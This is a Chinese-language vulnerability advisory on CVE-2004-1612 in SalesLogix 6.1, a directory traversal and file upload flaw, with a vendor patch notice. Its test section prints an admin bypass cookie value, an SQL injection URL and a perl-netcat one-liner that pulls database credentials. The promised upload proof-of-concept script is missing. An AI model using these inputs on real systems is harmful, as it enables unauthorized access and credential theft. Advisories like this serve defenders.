安全研究

安全漏洞
Best Software SalesLogix ProcessQueueFile文件上传漏洞

发布日期:2004-10-18
更新日期:2004-10-18

受影响系统:
SalesLogix SalesLogix 6.1
描述:
BUGTRAQ  ID: 11450
CVE(CAN) ID: CVE-2004-1612

SalesLogix是客户关系管理解决方案。

Best Software SalesLogix 6.1存在目录遍历漏洞,远程攻击者通过ProcessQueueFile请求内的"..",利用此漏洞可上传任意文件。

<*来源:Carl
  
  链接:http://xforce.iss.net/xforce/xfdb/17765
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Admin authentication bypass cookie value:
slxweb=user=Admin|teams=ADMIN!|usertype=Administrator|

SQL Injection example:
http://www.example.com/scripts/slxweb.dll/view?name=coninfo&amp;id=[SQL]

Revealing the database username and password:
perl -e &#39;print &quot;\x0&quot;x10 . &quot;\x20&quot; . &quot;\x0&quot;x3 .
&quot;GetConnection\x0SALESLOGIX_SERVER\x0&quot;&#39; | netcat 1.2.3.4
1707

Finally the following script has been provided as a proof of concept for the file upload issue:

建议:
厂商补丁:

SalesLogix
----------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://www.saleslogix.com

浏览次数:1761
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障